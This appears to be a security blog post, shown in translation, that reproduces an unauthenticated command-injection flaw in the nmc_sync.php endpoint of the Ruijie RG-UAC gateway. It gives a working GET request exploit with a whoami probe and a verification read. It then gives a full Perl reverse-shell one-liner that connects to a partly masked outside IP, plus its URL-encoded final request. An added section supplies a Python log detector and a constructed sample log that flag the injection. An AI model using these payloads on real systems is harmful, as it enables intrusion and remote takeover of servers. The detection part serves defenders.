程哥 (潇湘信安), 2023-12-10 03:30, posted from Hunan
0x01 Vulnerability overview
The nmc_sync.php endpoint of the Ruijie RG-UAC application management gateway contains a command execution vulnerability: an unauthenticated attacker can execute arbitrary commands and take control of the server.
0x02 Reproduction environment
0x03 Vulnerability reproduction
POC:
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Verification:
GET /view/systemConfig/management/test.txt HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0x04 Reverse shell
Many Linux commands are missing on this security appliance; after testing, only Perl turned out to work for a reverse shell, so a Perl reverse shell was generated on https://revshells.isisy.com.
The raw reverse shell is shown below. In Burp Suite it needs to be URL-encoded: select it and press the Ctrl+U shortcut.
perl -e 'use Socket;$i="121.*.***.*";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The final POC using the Perl reverse shell is as follows:
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d"121.*.***.*"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b' HTTP/1.1
Host: ***.**.***.**:****
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=c73e6c1766d9a1173ac820cb22dad128
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
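Both request shapes above (the plain pipe-and-redirect probe in 0x03 and the URL-encoded Perl payload in 0x04) leave the same trace in a web-server access log: a GET to nmc_sync.php whose template_path value is not a file-system path once percent-decoding and plus-to-space decoding are applied. The script below is an added detection example, not code from the original post or from Ruijie; it decodes the query the way the server would, flags template_path values that fall outside a path allowlist, and correlates later reads of non-PHP files in the same directory from the same source (the test.txt verification step). The log lines, IP addresses (including the 192.0.2.10 callback, a documentation address) and the /opt/nmc/templates value are constructed for the example.

```python
"""Detection helper for the nmc_sync.php command-injection pattern.

Added example (not part of the original post). Parses constructed common-log-format
access-log lines, decodes the query string and flags nmc_sync.php requests whose
template_path parameter is not a plain file-system path.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2023:03:30:01 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2023:03:30:05 +0800] "GET /view/systemConfig/management/test.txt HTTP/1.1" 200 12
10.0.0.5 - - [10/Dec/2023:03:31:10 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d%22192.0.2.10%22%3b$p%3d8080%3b' HTTP/1.1" 200 0
10.0.0.8 - - [10/Dec/2023:03:32:00 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=10.0.0.1&template_path=/opt/nmc/templates HTTP/1.1" 200 0
10.0.0.8 - - [10/Dec/2023:03:32:30 +0800] "GET /view/systemConfig/management/style.css HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\d+|-)')
TARGET_PATH = "/view/systemConfig/management/nmc_sync.php"
TARGET_DIR = "/view/systemConfig/management/"
# A template path should only ever be a plain file-system path (allowlist).
SAFE_PATH = re.compile(r"^[\w./-]*$")
# Characters reported when the allowlist fails, so an analyst sees what was injected.
SHELL_META = re.compile(r"[|;&`$(){}<>'\"\n]")


def parse_line(line):
    """Return (ip, timestamp, method, path, decoded query params) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, _proto, _status, _size = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes and turns '+' into spaces, so the encoded Perl
    # payload is inspected in the same form the shell would receive it.
    params = parse_qs(parts.query, keep_blank_values=True)
    return ip, ts, method, parts.path, params


def scan_log(text):
    """Flag nmc_sync.php calls with non-path template_path values, plus later
    reads of non-PHP files in the same directory from an IP that injected."""
    findings = []
    injecting_ips = set()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, _method, path, params = rec
        if path == TARGET_PATH:
            for value in params.get("template_path", []):
                if SAFE_PATH.match(value):
                    continue
                meta = "".join(sorted(set(SHELL_META.findall(value))))
                findings.append({
                    "ip": ip, "time": ts,
                    "reason": "shell metacharacters in template_path",
                    "meta": meta, "decoded": value,
                })
                injecting_ips.add(ip)
        elif ip in injecting_ips and path.startswith(TARGET_DIR) and not path.endswith(".php"):
            findings.append({
                "ip": ip, "time": ts,
                "reason": "follow-up read after injection",
                "meta": "", "decoded": path,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['reason']}: {f['decoded']!r}")
```

Run against the constructed sample it reports three events: the whoami probe, the follow-up read of test.txt from the same address, and the decoded Perl payload; the legitimate /opt/nmc/templates request and an unrelated static-file read are left alone. The same allowlist (SAFE_PATH) is the check a fix on the server side would apply before template_path ever reaches a shell.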